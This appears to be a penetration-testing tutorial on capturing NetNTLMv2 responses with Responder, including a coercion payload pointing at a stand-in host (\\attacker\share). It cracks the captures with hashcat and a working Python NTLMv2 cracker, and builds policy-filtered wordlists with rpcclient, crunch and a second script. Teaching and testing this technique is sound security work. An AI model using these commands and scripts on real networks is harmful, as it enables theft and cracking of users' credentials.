Responder

When a Windows host connects to a network service (SMB, HTTP, WebDAV and others), it will usually try to authenticate automatically with the logged-on user's credentials over NTLM. Responder takes advantage of this: it answers LLMNR, NBT-NS and mDNS name lookups with our own address and runs rogue services that accept the NTLM authentication and record the challenge/response.

If we have a payload that makes a target connect back to our machine for a Windows service (for example a UNC path like \\attacker\share embedded in a document, an XXE or SSRF pointing at our host, or an image tag on a page the victim opens), we can listen for that connection and capture the NetNTLMv2 challenge/response of the user attempting to connect:

responder -I [interface] -dP

Responder needs root and prints each capture to the console as well as saving it under its logs directory, as a line of the form user::DOMAIN:serverchallenge:NTProofStr:blob. The meaning of the single-letter flags has changed between releases (-d in particular), so check responder -h for the installed version before relying on a remembered flag set.

With the resulting hash, we can use hashcat to attempt to crack it offline.

Note that what Responder captures is a NetNTLMv2 challenge/response, which is hashcat mode 5600 (5500 for the rarer NetNTLMv1). Mode 1000 is the NTLM hash itself, the MD4 value stored in the SAM or NTDS, and only applies to hashes dumped from a host; hashcat will reject a Responder capture in that mode. For the same reason a NetNTLMv2 capture cannot be used for pass-the-hash, although it can be relayed (e.g. with ntlmrelayx) to another host that does not enforce SMB signing while the authentication is in progress.

The -a 0 flag tells hashcat we're using a wordlist; -O enables the optimized kernels, which are faster but cap the candidate length, so drop it when attacking long passwords

hashcat -m 5600 -a 0 [hashfile] [wordlist] -O
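To make the mode distinction concrete, here is an added Python example (not code from the original page or from Responder/hashcat) that reproduces what hashcat mode 5600 checks for each candidate: NT hash = MD4(UTF-16LE password), NTLMv2 key = HMAC-MD5 over the uppercased user name plus domain, and NTProofStr = HMAC-MD5(key, server challenge || blob). It parses Responder's capture line format and tries a wordlist against it. The user, domain, challenge and blob are constructed for the example; MD4 is implemented inline because Python builds on OpenSSL 3 frequently refuse hashlib.new("md4").

```python
import hmac
import hashlib
import struct
from typing import Dict, Iterable, Optional


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, written out because hashlib often lacks it on OpenSSL 3 builds."""
    def rot(x: int, n: int) -> int:
        return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):                          # round 1
            a, d, c, b = d, c, b, rot((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
        for i in range(16):                          # round 2
            k = (i % 4) * 4 + i // 4
            a, d, c, b = d, c, b, rot((a + G(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
        for i in range(16):                          # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, d, c, b = d, c, b, rot((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
        A, B, C, D = (A + a) & 0xFFFFFFFF, (B + b) & 0xFFFFFFFF, (C + c) & 0xFFFFFFFF, (D + d) & 0xFFFFFFFF
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    """The value hashcat -m 1000 cracks: MD4 of the UTF-16LE password, as stored in SAM/NTDS."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """The NTProofStr that hashcat -m 5600 recomputes per candidate (MS-NLMP NTOWFv2 / ComputeResponse)."""
    v2_key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(v2_key, server_challenge + blob, hashlib.md5).digest()


def parse_responder_line(line: str) -> Dict[str, object]:
    """Split Responder's NTLMv2 capture: user::domain:serverchallenge:ntproofstr:blob (all hex fields)."""
    user, _, domain, chal, proof, blob = line.strip().split(":")
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(chal),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose recomputed NTProofStr matches the captured one, else None."""
    h = parse_responder_line(line)
    for pw in wordlist:
        if hmac.compare_digest(ntlmv2_proof(pw, h["user"], h["domain"], h["challenge"], h["blob"]), h["proof"]):
            return pw
    return None


def forge_capture(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """Build a capture line for a known password so the cracker can be exercised offline (test helper only)."""
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample: hypothetical user and domain, a fixed 8-byte server challenge, a minimal NTLMv2 blob
# (version header, zeroed timestamp, 8-byte client challenge, terminator). Not a real capture.
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = bytes.fromhex("0101000000000000" + "00" * 8 + "aabbccddeeff0011" + "00000000")
SAMPLE_LINE = forge_capture("jsmith", "CORP", "Winter2023!", SAMPLE_CHALLENGE, SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, ["password", "Summer2023!", "Winter2023!"]))
```

The proof string in the capture is an HMAC keyed by the NT hash, never the NT hash itself, which is why the capture is cracked with -m 5600 and cannot be replayed as a pass-the-hash credential; in practice you hand the same line to hashcat rather than this script, which exists only to show the computation.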

If none of the standard wordlists succeeds and we already have some authenticated (even low-privileged) access to the domain, we can build a custom wordlist tailored to the target using rpcclient and crunch. First query the domain password policy over MS-RPC (connect with rpcclient -U [user] [dc-ip]):

rpcclient> getdompwinfo

This reports the domain's minimum password length and its password_properties flags; DOMAIN_PASSWORD_COMPLEX means a password must contain characters from at least three of the classes upper case, lower case, digit, symbol and other Unicode letters, and must not contain the account name. Those constraints tell us which lengths and character mixes are even possible, and we can use them to craft a password list with crunch

crunch [min] [max] -o my_wordlist.lst
  • -o writes the list to a file; -r resumes a previous -o run that was interrupted (rerun the same command with -r added)
  • -t specifies a pattern, eg: @@god@@@@, where only the placeholder characters @, ,, % and ^ change and every other character is kept literally; give [min] and [max] the length of the pattern:
     @ will insert lower case characters
     , will insert upper case characters
     % will insert numbers
     ^ will insert symbols
  • -f [charset file] [charset name] picks a predefined charset (e.g. from /usr/share/crunch/charset.lst) instead of the defaults, which is how you restrict the symbol set to what the policy allows
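As an added Python example (not from the original page and not part of crunch or rpcclient), the following reproduces what a crunch -t pattern expands to, but filters the candidates through the policy that getdompwinfo reported, so you can see how many words a pattern really produces and keep only the ones the domain would have accepted. The getdompwinfo text is constructed to resemble rpcclient's output, the symbol class approximates crunch's default symbol set, and the account-name check of Windows complexity is left out.

```python
import itertools
import re
import string
from typing import Dict, Iterator

# Placeholder classes as crunch -t defines them; the symbol set is an approximation of crunch's default.
CHARSETS: Dict[str, str] = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": string.punctuation,
}

DOMAIN_PASSWORD_COMPLEX = 0x00000001   # bit in password_properties (MS-SAMR)

# Constructed sample in the shape of 'rpcclient> getdompwinfo' output on a domain with complexity enabled.
SAMPLE_GETDOMPWINFO = """\
min_password_length: 7
password_properties: 0x00000001
\tDOMAIN_PASSWORD_COMPLEX
"""


def parse_getdompwinfo(text: str) -> Dict[str, int]:
    """Pull the minimum length and the properties bitmask out of getdompwinfo-style output."""
    min_len = int(re.search(r"min_password_length:\s*(\d+)", text).group(1))
    props = int(re.search(r"password_properties:\s*(0x[0-9a-fA-F]+)", text).group(1), 16)
    return {"min_len": min_len, "complex": bool(props & DOMAIN_PASSWORD_COMPLEX)}


def meets_policy(pw: str, policy: Dict[str, int]) -> bool:
    """Length check plus, when complexity is on, at least three of the four ASCII character classes."""
    if len(pw) < policy["min_len"]:
        return False
    if not policy["complex"]:
        return True
    classes = [any(c.islower() for c in pw), any(c.isupper() for c in pw),
               any(c.isdigit() for c in pw), any(c in string.punctuation for c in pw)]
    return sum(classes) >= 3


def expand_pattern(pattern: str) -> Iterator[str]:
    """Yield every word the crunch pattern describes: placeholders vary, other characters stay literal."""
    slots = [CHARSETS.get(ch, ch) for ch in pattern]
    for combo in itertools.product(*slots):
        yield "".join(combo)


def pattern_size(pattern: str) -> int:
    """Number of words the pattern produces (the line count crunch announces before it starts writing)."""
    n = 1
    for ch in pattern:
        n *= len(CHARSETS.get(ch, ch))
    return n


def policy_wordlist(pattern: str, policy: Dict[str, int]) -> Iterator[str]:
    """Candidates from the pattern that the domain policy would actually have accepted."""
    return (w for w in expand_pattern(pattern) if meets_policy(w, policy))


if __name__ == "__main__":
    policy = parse_getdompwinfo(SAMPLE_GETDOMPWINFO)
    pat = ",@@god%%"                      # hypothetical pattern: capital, two letters, literal 'god', two digits
    print(policy, pattern_size(pat))
    for w in itertools.islice(policy_wordlist(pat, policy), 5):
        print(w)
```

The equivalent crunch invocation for that pattern would be crunch 8 8 -t ,@@god%% -o my_wordlist.lst; the point of the policy filter is that a pattern such as @@@god% can never satisfy a complexity-enabled domain, so generating and cracking it is wasted time, and pattern_size tells you before you start whether a pattern is small enough to be worth running at all.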
